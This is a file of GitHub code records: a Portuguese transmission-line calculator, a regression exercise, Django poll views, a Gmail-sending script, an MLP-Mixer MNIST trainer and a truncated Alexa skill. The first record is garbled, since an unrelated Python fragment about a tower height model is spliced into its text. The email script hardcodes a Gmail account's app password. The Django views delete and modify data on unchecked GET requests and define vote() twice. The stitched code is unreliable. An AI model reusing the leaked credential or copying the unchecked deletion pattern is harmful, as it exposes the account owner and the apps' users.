+{"seq_id":"6340054479","text":"from linha_transmissao import Linha_transmissao\r\nfrom metodos_linhas import raio_eq, Pnat\r\nfrom numpy import sqrt\r\nimport numpy as np\r\nfrom numpy.linalg import inv\r\n\r\nnp.set_printoptions(linewidth=500)\r\n\r\n#------------------------------------------------------------------------------------------------------\r\n# Dados dos condutores de fase\r\n# Name: (r0,r1,pfase) ohms/m\r\nCondutoresEspecs = {\"Bluejay\": (8.702*10**-3, 15.977*10**-3, 29.544*10**-9),\r\n                    \"Rail\": (8.702*10**-3, 14.796*10**-3, 29.538*10**-9),\r\n                    \"Ruddy\": (7.821*10**-3, 14.364*10**-3, 29.559*10**-9),\r\n                    \"Grossbeak\": (7.456*10**-3, 12.573*10**-3, 29.538*10**-9),\r\n                    \"Dove\": (6.988*10**-3, 11.773*10**-3, 29.567*10**-9),\r\n                    \"Penguim\": (4.123*10**-3, 7.150*10**-3, 28.554*10**-9),\r\n                    \"Leghorn\": (4.840*10**-3, 6.7180*10**-3, 29.586*10**-9),\r\n                    \"Minorca\": (4.390*10**-3, 6.0960*10**-3, 29.579*10**-9),\r\n                    \"3/8 EHS\": (0, 4.570*10**-3, 276.470*10**-9)}\r\n#------------------------------------------------------------------------------------------------------\r\n#Dados das posições espaciais dos condutores. 
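# The broadcast-tower search above relies on the pyramid height model
# h(x, y) = max(H - |x - cx| - |y - cy|, 0): any observation with h >= 1 pins
# down H for a candidate center, and conflict() rejects centers whose predicted
# height disagrees with any observation. A tiny illustration of the model:
cx, cy, H = 2, 3, 6
def height(x, y):
    return max(H - abs(x - cx) - abs(y - cy), 0)
print(height(2, 3), height(4, 3), height(9, 9))  # 6 4 0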
Inicialmente o dicionario possui só duas linhas pois nelas foram dados direto as coordenadas, as outras precisamos fazer alguns calculos antes e serão adicionadas aos poucos\r\n#Name: (rext,rint,(Xc-1,Xc0,Xc1),(Yc-1,Yc,Yc+1),(Xpr,Ypr,Xpr2,Ypr2),n)\r\n# n é o numero de condutores por fase\r\n# Xc cordenadas dos centros dos 4 condutores\r\n# Yc cordenadas dos centros dos 4 condutores PS: na formula subtrai por 2/3 da flecha\r\n#Pros dois primeiros botei o raio como sendo o db*sqrt(2)/2\r\nCondutoresPos = {\"Bluejay\": (raio_eq(4, CondutoresEspecs[\"Bluejay\"][1], .475*sqrt(2)/2),raio_eq(4, CondutoresEspecs[\"Bluejay\"][0], .475*sqrt(2)/2) ,(-15.85, 0, 15.85), (35.9-2*20.9/3, 35.9-2*20.9/3, 35.9-2*20.9/3), (-14.45, 45.9-2*14.7/3, 14.45, 45.9-2*14.7/3), 4),\r\n \"Rail Normal\": (raio_eq(4, CondutoresEspecs[\"Rail\"][1],.475*sqrt(2)/2), raio_eq(4, CondutoresEspecs[\"Rail\"][0],.475*sqrt(2)/2), (-15, -11, -6, 6, 11, 15), (23.2, 33.2, 23.2, 23.2, 33.2, 23.2), (-8.8, 42.7, 8.8, 42.7), 4)\r\n }\r\n#------------------------------------------------------------------------------------------------------\r\n\r\n# ============ 500kV rail convencional ===============\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\nn_rail_comp = 3\r\nR_rail_compExt = (CondutoresEspecs[\"Rail\"][1] *\r\n np.sqrt(3))/3 + CondutoresEspecs[\"Rail\"][1]\r\n\r\nR_rail_compInt = (CondutoresEspecs[\"Rail\"][0] *\r\n np.sqrt(3))/3 + CondutoresEspecs[\"Rail\"][0]\r\n\r\nxy = ((-11.000, 10.736), (-10.771, 11.132),\r\n (-11.229, 11.132), (0.000, 10.736), (0.229,\r\n 11.132), (-0.229, 11.132), (11.000, 10.736),\r\n (10.771, 11.132), (11.229, 11.132), (-6.000, 22.000), (6.000, 22.000))\r\n\r\n#centro dos condutores equivalentes (os dois ultimos pares sao dos para-raios)\r\nxyc = (((-10.771 + -11.229)/2, (2*11.132 + 10.736)/3),\r\n ((0.229 + -0.229)/2, (2*11.132 + 10.736)/3),\r\n ((10.771 + 11.229)/2, (2*11.132 + 10.736)/3),\r\n (-6.000, 22.000), (6.000, 22.000))\r\n\r\n\r\nCondutoresPos[\"Rail Convencional\"] = (raio_eq(3, CondutoresEspecs[\"Rail\"][1], R_rail_compExt),raio_eq(3, CondutoresEspecs[\"Rail\"][0], R_rail_compInt),\r\n (xyc[0][0], xyc[1][0], xyc[2][0]),\r\n (xyc[0][1], xyc[1][1], xyc[2][1]),\r\n (xyc[3][0], xyc[3][1], xyc[4][0], xyc[4][1]), 3)\r\n\r\n\r\n# ================= 500kV rail compacto ====================\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\n\r\nn_rail_comp = 4\r\nR_rail_comp = 0\r\n\r\nxy2 = ((-4.271, 10.771), (-4.271, 11.229), (-4.729, 11.229), (-4.729, 10.771), (0.229, 15.271),\r\n (0.229, 15.729), (-0.229, 15.729), (-0.229, 15.271), (4.271,10.771),\r\n (4.271, 11.229), (4.729, 11.229), (4.729, 10.771), (-3.500, 26.000), (3.500, 26.000))\r\n \r\n# centro dos condutores equivalentes (os dois ultimos pares sao dos para-raios)\r\nxy2c = (((-4.271 + -4.729)/2, (10.771+11.229)/2),\r\n ((0.229 + -0.229)/2, (15.729 + 15.271)/2),\r\n ((4.271 + 4.729)/2, (11.229 + 10.771)/2),\r\n (-3.500, 26.000), (3.500, 26.000))\r\n \r\n\r\nRext = sqrt((xy2c[0][0] - xy2[0][0])**2 + (xy2c[0][1] - xy2[0][1])**2)/2\r\nRint = Rext*CondutoresEspecs[\"Rail\"][0]/CondutoresEspecs[\"Rail\"][1]\r\n\r\nCondutoresPos[\"Rail Compacto\"] = (raio_eq(4, CondutoresEspecs[\"Rail\"][1], Rext),raio_eq(4, CondutoresEspecs[\"Rail\"][0], Rint),\r\n (xy2c[0][0], xy2c[1][0], xy2c[2][0]),\r\n (xy2c[0][1], xy2c[1][1], xy2c[2][1]),\r\n (xy2c[3][0], xy2c[3][1], xy2c[4][0], xy2c[4][1]), 4)\r\n\r\n# =============== 500kV rail recapacitado =====================\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\nn_rail_cap = 
4\r\nR_rail_cap1 = 0\r\nR_rail_cap2 = 0\r\n\r\n# raio do condutor equivalente\r\nxy3 = ((-7.229, 8.639), (-7.229, 10.500), (-6.771, 10.500), (-6.771,\r\n 8.639), (-0.229, 10.500),\r\n (-0.229, 9.876), (0.229, 9.876), (0.229, 10.500), (7.229,\r\n 8.639), (7.229, 10.500), (6.771, 10.500),\r\n (6.771, 8.639), (-5.000, 20.500), (5.000, 20.500))\r\n\r\nxy3c = (((-7.229 + -6.771)/2, (8.639 + 10.500)/2),\r\n (((-0.229 + 0.229)/2, (9.876 + 10.500)/2)),\r\n (((6.771 + 7.229)/2, (8.639 + 10.500)/2)),\r\n (-5.000, 20.500), (5.000, 20.500))\r\n\r\n\r\nRext = sqrt((xy3c[0][0] - xy3[0][0])**2 + (xy3c[0][1] - xy3[0][1])**2)/2\r\nRint = Rext*CondutoresEspecs[\"Rail\"][0]/CondutoresEspecs[\"Rail\"][1]\r\n\r\n\r\nCondutoresPos[\"Rail Recapacitado\"] = (raio_eq(4, CondutoresEspecs[\"Rail\"][1], Rext),raio_eq(4, CondutoresEspecs[\"Rail\"][0], Rint),\r\n (xy3c[0][0], xy3c[1][0], xy3c[2][0]),\r\n (xy3c[0][1], xy3c[1][1], xy3c[2][1]),\r\n (xy3c[3][0], xy3c[3][1], xy3c[4][0], xy3c[4][1]), 4)\r\n\r\n# =================== 345kv ruddy ==========================\r\n#2 ultimos elementos sao pararraio, da forma (x, y)\r\nn_ruddy = 2\r\n# raio do condutor equivalente é igual ao diametro\r\nR_ruddy = 2*CondutoresEspecs[\"Ruddy\"][1]\r\nxy1 = ((-7.229, 10.5), (-6.771, 10.500), (-0.229, 10.500), (0.229,\r\n 10.500), (7.229, 10.500),\r\n (6.771, 10.500), (-5.000, 20.500), (5.000, 20.500))\r\n\r\nxy1c = (((-7.229 + -6.771)/2, 10.5),\r\n ((-0.229 + 0.229)/2, 10.5),\r\n ((7.229 + 6.771)/2, 10.5),\r\n (-5.000, 20.500), (5.000, 20.500))\r\n\r\n\r\nRext = sqrt((xy1c[0][0] - xy1[0][0])**2 + (xy1c[0][1] - xy1[0][1])**2)/2\r\nRint = Rext*CondutoresEspecs[\"Ruddy\"][0]/CondutoresEspecs[\"Ruddy\"][1]\r\nR1 = sqrt((xy1c[0][0] - xy1[0][0])**2 + (xy1c[0][1] - xy1[0][1])**2)\r\n\r\nCondutoresPos[\"Ruddy\"] = (raio_eq(2, CondutoresEspecs[\"Ruddy\"][1], Rext),raio_eq(2, CondutoresEspecs[\"Ruddy\"][0], Rint),\r\n (xy1c[0][0], xy1c[1][0], xy1c[2][0]),\r\n (xy1c[0][1], xy1c[1][1], xy1c[2][1]),\r\n (xy1c[3][0], xy1c[3][1], xy1c[4][0], xy1c[4][1]), 4)\r\n\r\n\r\n#===================================================================================================\r\n#========================== CALCULO DOS PARAMETROS PARA CADA CONDUTOR ==============================\r\n#===================================================================================================\r\n\r\n#Lembrando os parametros para chamar a classe abaixo:\r\n#(self, r_int, r_ext, nfase, npr, xc, yc, rhoc, rhoc_pr, rf, rpr):\r\nVs = [750000, 500000, 500000, 500000, 500000, 345000] #Voltagem dos condutores. Será util para o calculo da potencia\r\nj = 0 #Contagem de iterações feitas. Util para escolher a voltagem\r\n\r\nprint((20*2+7)*'=')\r\nprint(20*'=' + \" Resultados \" + 20*'=')\r\nprint((20*2+7)*'=' + '\\n')\r\nfor i in CondutoresPos:\r\n #matrizes de sequencia\r\n a = np.exp(1j * np.deg2rad(120))\r\n a2 = a**2\r\n A = np.array([[1, 1, 1], [1, a2, a], [1, a, a2]])\r\n zero = np.zeros((3,3))\r\n\r\n #Para saber qual tipo de condutor trabalharemos\r\n if i == \"Bluejay\":\r\n nameSpec = \"Bluejay\"\r\n else:\r\n nameSpec = \"Rail\"\r\n\r\n npr = 2 #numero de para-raios\r\n #Necessario fazer um if para o caso do rail normal pois é o unico circuito duplo, então devemos tomar alguns cuidados\r\n if i == \"Rail Normal\":\r\n #Atribuimos os valores que serão utilizados para chamar a classe. 
Raios, numero de condutores, posição espacial dos condutores, rhos\r\n nfase = 6\r\n r_ext = CondutoresPos[i][0]\r\n r_int = CondutoresPos[i][1]\r\n xc = np.concatenate((np.array(CondutoresPos[i][2]), np.array([CondutoresPos[i][4][0]]), np.array([CondutoresPos[i][4][2]])))\r\n #xc_n = np.concatenate((np.array(-CondutoresPos[i][2]), np.array(-[CondutoresPos[i][4][0]]), np.array(-[CondutoresPos[i][4][2]])))\r\n yc = np.concatenate(( np.array(CondutoresPos[i][3]), np.array([CondutoresPos[i][4][1]]) , np.array([CondutoresPos[i][4][3]]) ))\r\n #yc_n = np.concatenate(( np.array(-CondutoresPos[i][3]), np.array(-[CondutoresPos[i][4][1]]) , np.array(-[CondutoresPos[i][4][3]]) ))\r\n rhoc = CondutoresEspecs[nameSpec][2]\r\n rhoc_pr = CondutoresEspecs[\"3/8 EHS\"][2]\r\n rf = r_ext\r\n rpr = CondutoresEspecs[\"3/8 EHS\"][1]\r\n print(\"Linha: \" + i)\r\n Linha = Linha_transmissao(r_int, r_ext, nfase, npr, xc, yc, rhoc, rhoc_pr, r_ext, rpr)\r\n \r\n #Uma vez construida a linha podemos determinar seus parametros de impedancia e admitancia\r\n Z = Linha.impedancia()\r\n Y = Linha.admitancia()\r\n Z = Z.astype(np.csingle) #Codigo necessario para o python ler o tipo de variavel \r\n Y = Y.astype(np.csingle)\r\n #Redução de Kron para eliminar o para-raio\r\n Zabc = 0j + np.zeros((6,6))\r\n Yabc = 0j + np.zeros((6,6))\r\n Zabc = Z[0:nfase,0:nfase] - Z[0:nfase,nfase:] @ inv(Z[nfase:,nfase:]) @ Z[nfase:,0:nfase]\r\n Yabc = Y[0:nfase,0:nfase] - Y[0:nfase,nfase:] @ inv(Y[nfase:,nfase:]) @ Y[nfase:,0:nfase]\r\n \r\n #A = [[A, 0] matriz de sequencia precisa ser 6x6 agr\r\n # [0, A]]\r\n aux1 = np.concatenate((A,zero))\r\n aux2 = np.concatenate((zero,A))\r\n A = np.concatenate((aux1,aux2),axis=1) #matriz de sequencia para o caso 6x6\r\n \r\n \r\n else: #Casos onde o circuito é simples\r\n #(rext,rint,(Xc-1,Xc0,Xc1),(Yc-1,Yc,Yc+1),(Xpr,Ypr,Xpr2,Ypr2),n)\r\n r_ext = CondutoresPos[i][0]\r\n r_int = CondutoresPos[i][1]\r\n npr = 2\r\n nfase = 3\r\n xc = np.concatenate((np.array(CondutoresPos[i][2]), np.array([CondutoresPos[i][4][0]]), np.array([CondutoresPos[i][4][2]])))\r\n yc = np.concatenate(( np.array(CondutoresPos[i][3]), np.array([CondutoresPos[i][4][1]]) , np.array([CondutoresPos[i][4][3]]) ))\r\n rhoc = CondutoresEspecs[nameSpec][2]\r\n rhoc_pr = CondutoresEspecs[\"3/8 EHS\"][2]\r\n rf = r_ext\r\n rpr = CondutoresEspecs[\"3/8 EHS\"][1]\r\n\r\n\r\n print(\"Linha: \" + i)\r\n Linha = Linha_transmissao(r_int, r_ext, nfase, npr, xc, yc, rhoc, rhoc_pr, r_ext, rpr)\r\n Z = Linha.impedancia()\r\n Y = Linha.admitancia()\r\n Z = Z.astype(np.csingle)\r\n Y = Y.astype(np.csingle)\r\n #Retiramos as info do pararaio das matrizes atraves da reducao de kron\r\n Zabc = 0j + np.zeros((3,3))\r\n Yabc = 0j + np.zeros((3,3))\r\n\r\n Zabc = Z[0:nfase,0:nfase] - Z[0:nfase,nfase:] @ inv(Z[nfase:,nfase:]) @ Z[nfase:,0:nfase]\r\n Yabc = Y[0:nfase,0:nfase] - Y[0:nfase,nfase:] @ inv(Y[nfase:,nfase:]) @ Y[nfase:,0:nfase]\r\n \r\n #recuperação das matrizes de sequencia\r\n z012 = inv(A)@Zabc@A\r\n y012 = inv(A)@Yabc@A\r\n \r\n #Utilizamos as impedancias e admitancias de sequencia positiva para o calculo da potencia natural do circuito\r\n if len(A)==3:\r\n Pnatural = Pnat(Vs[j], z012[1][1], y012[1][1])\r\n elif len(A)==6: #Em circuitos duplos multiplicamos a potencia por dois pois nossos calculos são baseados em 1 linha\r\n Pnatural = 2*Pnat(Vs[j], z012[1][1], y012[1][1])\r\n\r\n print(\"Impedancia Z+ = {} Ohms\" .format(z012[1][1]))\r\n print(\"Admitância Y+ = {} Ohms\" .format(y012[1][1]))\r\n print(\"Potencia natural = {} MW\\n\" 
.format(round(Pnatural/(10**6),3)))\r\n    j+=1\r\n","repo_name":"ll0pez10/transmissao-energia-eletrica","sub_path":"exercicio1.py","file_name":"exercicio1.py","file_ext":"py","file_size_in_byte":12543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"75558456512","text":"\"\"\"\nAuthor: Charles Herrmann\n\nDate: 4/21/21\n\nObjective: In this challenge, we practice using linear regression techniques. \n\nTask: A group of five students enrolls in Statistics immediately after taking a Math aptitude test. Each student's Math aptitude test score, x, and Statistics course grade, y, can be expressed as the following list of (x, y) points:\n1. (95, 85)\n2. (85, 95)\n3. (80, 70)\n4. (70, 65)\n5. (60, 70)\nIf a student scored an 80 on the Math aptitude test, what grade would we expect them to achieve in Statistics? Determine the equation of the best-fit line using the least squares method, then compute and print the value of y when x = 80.\n\nInput Format: There are five lines of input; each line contains two space-separated integers describing a student's respective x and y grades:\n - 95 85\n - 85 95\n - 80 70\n - 70 65\n - 60 70\nIf you do not wish to read this information from stdin, you can hard-code it into your program.\n\"\"\"\n\n# Enter your code here. Print output to STDOUT\n\nfrom statistics import mean, pstdev\n\n\ndef pearson(x, y):\n    n = len(x)\n    mx, sx, my, sy = mean(x), pstdev(x), mean(y), pstdev(y)\n    return sum((xi - mx) * (yi - my) for xi, yi in zip(x, y)) / (n * sx * sy)\n\n\ndef linear_regression(x, y):\n    b = pearson(x, y) * pstdev(y) / pstdev(x)\n    return mean(y) - b * mean(x), b\n\n\nif __name__ == \"__main__\":\n    x = [95, 85, 80, 70, 60]\n    y = [85, 95, 70, 65, 70]\n\n    a, b = linear_regression(x, y)\n\n    # to make prediction\n    x_test = 80\n    y_test = a + b * x_test\n    print(f\"{y_test:.3f}\")\n","repo_name":"Cherrmann8/10_Days_of_Statistics","sub_path":"Day_8/least_square_regression_line.py","file_name":"least_square_regression_line.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"33390613869","text":"from django.shortcuts import render, redirect\nfrom pools.models import *\nfrom .forms import QuestionForm, ChoiceForm\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render\nfrom django.urls import reverse\n\ndef index(request):\n    return render(request,'pools/index.html',{'questions':Question.objects.filter(closed=False).order_by('-pub_date')})\n\ndef exibir(request, question_id):\n    question = Question.objects.get(id=question_id)\n    return render(request, 'pools/question.html', {'question':question})\n\ndef exibir_fechada(request):\n    questions = ''\n    #try:\n    questions = Question.objects.filter(closed=True)\n    #except Exception as e:\n    #    print(e)\n    #    return render(request, 'pools/question.html', {'questions':questions})    \n    return render(request, 'pools/question.html', {'questions':questions})\n    \n\ndef results(request, question_id):\n    question = Question.objects.get(id=question_id)\n    return render(request, 'pools/results.html',{'question':question})\n\ndef vote(request, question_id, choice_id):\n    choice = Choice.objects.get(id=choice_id)\n    choice.votes += 1\n    choice.save()\n    question = Question.objects.get(id=question_id)\n    return render(request, 'pools/question.html', {'question':question})\n\ndef vote(request, question_id):\n    question = 
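# The ground-wire elimination used in the transmission-line script above is a
# Kron reduction: partition the full matrix as [[Zff, Zfg], [Zgf, Zgg]] and
# fold the ground-wire rows into the phase block via
# Zred = Zff - Zfg @ inv(Zgg) @ Zgf. A tiny self-contained numpy check:
import numpy as np
from numpy.linalg import inv
Z = np.array([[4.0, 1.0, 0.5],
              [1.0, 3.0, 0.2],
              [0.5, 0.2, 2.0]])
n = 2  # keep the first two "phase" rows, eliminate the last "ground" row
Zred = Z[:n, :n] - Z[:n, n:] @ inv(Z[n:, n:]) @ Z[n:, :n]
print(Zred)  # 2x2 reduced matrix with the third conductor's coupling folded in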
Question.objects.get(id=question_id)\n choice = Choice.objects.get(id=request.POST['choice'])\n choice.votes += 1\n choice.save()\n return HttpResponseRedirect(reverse('results', args=(question.id,)))\n\ndef apagar(request, question_id):\n question = Question.objects.get(id=question_id)\n question.delete()\n return render(request,'pools/index.html',{'questions': Question.objects.filter(closed=False).order_by('-pub_date')})\n\ndef status(request, question_id):\n question = Question.objects.get(id=question_id)\n if question.closed == True:\n question.closed = False\n question.save()\n else:\n question.closed = True\n question.save()\n return render(request,'pools/index.html',{'questions': Question.objects.filter(closed=False).order_by('-pub_date')})\n\n\n'''def cadastrar(request):\n if request.method == 'POST':\n form = QuestionForm(request.POST)\n if form.is_valid():\n form.save()\n else:\n form = QuestionForm()\n return render(request, 'pools/new_quest.html', {'form':form})'''\n\ndef cadastrar(request):\n valor = ''\n if request.method == 'POST':\n form = QuestionForm(request.POST)\n if form.is_valid():\n quest = Question(question_text=form.cleaned_data['question_text'])\n quest.save()\n valor = form.cleaned_data['question_text']\n form = QuestionForm()\n else:\n form = QuestionForm()\n return render(request, 'pools/new_quest.html', {'form':form, 'valor':valor})\n\ndef responder(request, question_id):\n quest = Question.objects.get(id=question_id)\n valor = ''\n if request.method == 'POST':\n form = ChoiceForm(request.POST)\n if form.is_valid():\n quest.choices.create(choice_text=form.cleaned_data['choice_text'], \n votes=form.cleaned_data['votes'])\n valor = form.cleaned_data['choice_text']\n form = ChoiceForm() \n else:\n form = ChoiceForm()\n return render(request, 'pools/new_choice.html', {'form':form, 'question':quest, 'valor':valor})","repo_name":"infsolution/django","sub_path":"connectedin/pools/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40877451370","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 12 15:12:08 2021\r\n\r\n@author: \r\n\"\"\"\r\n \r\nimport smtplib, ssl\r\n\r\ndef WyslijWiadomosc(serwer,port,nadawca,haslo,wiadomosc):\r\n try:\r\n ssl_pool=ssl.create_default_context()\r\n with smtplib.SMTP_SSL(serwer,port,context=ssl_pool) as serwer:\r\n serwer.login(nadawca,haslo)\r\n serwer.sendmail(nadawca,odbiorca,wiadomosc)\r\n print(\"Wiadomosc wyslana pomyslnie!\")\r\n except:\r\n print(\"Nie udalo sie wyslac wiadomosci! : \")\r\n\r\n\r\nport=465\r\nserwer=\"smtp.gmail.com\"\r\nnadawca=\"wimimprojekt@gmail.com\"\r\nhaslo=\"yuxjyaazdouprhun\"\r\n\r\nodbiorca=input(\"Podaj odbiorcę: \")\r\ntemat=input(\"Podaj temat wiadomosci: \")\r\nwiadomosc1=input(\"Podaj wiadomosc: \")\r\npotwierdzenie=input(\"Czy na pewno chcesz wysłać wiadomosc do \"+odbiorca+\" ? 
(wpisz tak(t) lub nie(n))\")\r\n\r\nwiadomosc=\"Subject:\"+temat+\"\\nFROM: Informatyka projekt\\n\"+wiadomosc1\r\n\r\n\r\nif potwierdzenie == \"tak\" or potwierdzenie == \"Tak\" or potwierdzenie == \"t\" or potwierdzenie == \"T\":\r\n WyslijWiadomosc(serwer,port,nadawca,haslo,wiadomosc)\r\nelif potwierdzenie == \"nie\" or potwierdzenie == \"Nie\" or potwierdzenie == \"n\" or potwierdzenie == \"N\":\r\n print(\"Nie wysłano wiadomosci!\")\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n","repo_name":"MartineLi96/Projekt_na_zaliczenie","sub_path":"Projekt_mail.py","file_name":"Projekt_mail.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75165435390","text":"from pytest import xfail\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom einops.layers.torch import Rearrange\nimport numpy as np\n\nif torch.cuda.is_available():\n device = torch.device('cuda')\nelse:\n device = torch.device('cpu')\n \nprint('Using PyTorch version:', torch.__version__, ' Device:', device)\n\nbatch_size = 32\n\ntrain_dataset = datasets.MNIST('/codes/DeepLearning/DL/FFN/data', \n train=True, \n download=True, \n transform=transforms.ToTensor())\n\nvalidation_dataset = datasets.MNIST('/codes/DeepLearning/DL/FFN/data', \n train=False, \n transform=transforms.ToTensor())\n\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n batch_size=batch_size, \n shuffle=True)\n\nvalidation_loader = torch.utils.data.DataLoader(dataset=validation_dataset, \n batch_size=batch_size, \n shuffle=False)\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, hidden_dim):\n super().__init__()\n self.net = nn.Sequential(\n nn.Linear(dim, hidden_dim),\n nn.GELU(),\n nn.Dropout(0.2),\n nn.Linear(hidden_dim, dim),\n nn.Dropout(0.2)\n )\n def forward(self, x):\n return self.net(x)\n\nclass MLPMixerBlock(nn.Module):\n def __init__(self, dim, num_patches, token_dim, channel_dim):\n super().__init__()\n self.token_mlp = nn.Sequential(\n nn.LayerNorm(dim),\n Rearrange('b n d -> b d n'),\n FeedForward(num_patches, token_dim),\n Rearrange('b d n -> b n d')\n )\n self.channel_mlp = nn.Sequential(\n nn.LayerNorm(dim),\n FeedForward(dim, channel_dim)\n )\n\n def forward(self, x):\n x = x + self.token_mlp(x)\n x = x + self.channel_mlp(x)\n return x\n \n\nclass MLPMixer(nn.Module):\n def __init__(self, image_size, channels, patch_size, dim, depth, token_dim, channel_dim):\n super(MLPMixer, self).__init__()\n assert image_size % patch_size == 0\n\n self.num_patches = (image_size // patch_size) **2\n\n self.patch_embedding = nn.Sequential(\n nn.Conv2d(channels, dim, patch_size, patch_size),\n Rearrange('b c h w -> b (h w) c'),\n )\n\n self.mixer_blocks = nn.ModuleList([])\n for _ in range(depth):\n self.mixer_blocks.append(MLPMixerBlock(dim, self.num_patches, token_dim, channel_dim))\n \n self.ln = nn.LayerNorm(dim)\n\n self.fc = nn.Linear(dim, 10)\n \n def forward(self, x):\n x = self.patch_embedding(x)\n\n for block in self.mixer_blocks:\n x = block(x)\n\n x = self.ln(x)\n x = x.mean(dim=1)\n x = F.log_softmax(self.fc(x), dim=1)\n return x\n\nmodel = MLPMixer(image_size=28, channels=1, patch_size=7, dim=32, depth=4, token_dim=64, channel_dim=128).to(device)\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\ncriterion = nn.CrossEntropyLoss()\n\ndef train(epoch, log_interval=200):\n # Set model to training mode\n model.train()\n \n # Loop over each batch from the 
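# Shape sketch for the MLP-Mixer block defined above, assuming batch b,
# n patches, and hidden dim d: token mixing transposes (b, n, d) -> (b, d, n)
# so its MLP acts across the n patches, then transposes back, while channel
# mixing stays at (b, n, d) and mixes across d. einops does the transposes:
import torch
from einops import rearrange
x = torch.randn(2, 16, 32)            # (b, n, d) = (2, 16, 32)
t = rearrange(x, 'b n d -> b d n')    # token-mixing view: MLP over n = 16
print(t.shape)                        # torch.Size([2, 32, 16])
print(rearrange(t, 'b d n -> b n d').shape)  # back to torch.Size([2, 16, 32])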
training set\n for batch_idx, (data, target) in enumerate(train_loader):\n # Copy data to GPU if needed\n data = data.to(device)\n target = target.to(device)\n\n # Zero gradient buffers\n optimizer.zero_grad() \n \n # Pass data through the network\n output = model(data)\n\n # Calculate loss\n loss = criterion(output, target)\n\n # Backpropagate\n loss.backward() \n \n # Update weights\n optimizer.step() # w - alpha * dL / dw\n \n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.data.item()))\n \n\ndef validate(loss_vector, accuracy_vector):\n model.eval()\n val_loss, correct = 0, 0\n for data, target in validation_loader:\n data = data.to(device)\n target = target.to(device)\n output = model(data)\n val_loss += criterion(output, target).data.item()\n pred = output.data.max(1)[1] # get the index of the max log-probability\n correct += pred.eq(target.data).cpu().sum()\n\n val_loss /= len(validation_loader)\n loss_vector.append(val_loss)\n\n accuracy = 100. * correct.to(torch.float32) / len(validation_loader.dataset)\n accuracy_vector.append(accuracy)\n \n print('\\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n val_loss, correct, len(validation_loader.dataset), accuracy))\n \nepochs = 10\n\nif __name__ == \"__main__\":\n print(model)\n\n lossv, accv = [], []\n for epoch in range(1, epochs + 1):\n train(epoch)\n validate(lossv, accv)","repo_name":"Stupid-wangnz/DeepingLearning","sub_path":"FFN/MLPMixer.py","file_name":"MLPMixer.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5500661427","text":"# -*- coding: utf-8 -*-\n\n# This sample demonstrates handling intents from an Alexa skill using the Alexa Skills Kit SDK for Python.\n# Please visit https://alexa.design/cookbook for additional examples on implementing slots, dialog management,\n# session persistence, api calls, and more.\n# This sample is built using the handler classes approach in skill builder.\nimport logging\nimport gettext\n\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom ask_sdk_core.dispatch_components import (\n AbstractRequestHandler, AbstractRequestInterceptor, AbstractExceptionHandler)\nimport ask_sdk_core.utils as ask_utils\nfrom ask_sdk_core.handler_input import HandlerInput\n\nfrom ask_sdk_model import Response\nfrom alexa import data\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Skill Launch.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n\n return ask_utils.is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.WELCOME_MESSAGE)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass HelloWorldIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Hello World Intent.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"HelloWorldIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output 
= _(data.HELLO_MSG)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n # .ask(\"add a reprompt if you want to keep the session open for the user to respond\")\n .response\n )\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for Help Intent.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return ask_utils.is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = _(data.HELP_MSG)\n\n return (\n handler_input.response_builder\n .speak(speak_output)\n .ask(speak_output)\n .response\n )\n\n\nclass CancelOrStopIntentHandler(AbstractRequestHandler):\n \"\"\"Single handler for Cancel and Stop Intent.\"\"\"\n\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (ask_utils.is_intent_name(\"AMAZON.CancelIntent\")(handler_input) or\n ask_utils.is_intent_name(\"AMAZON.StopIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n _ = handler_input.attributes_manager.request_attributes[\"_\"]\n speak_output = 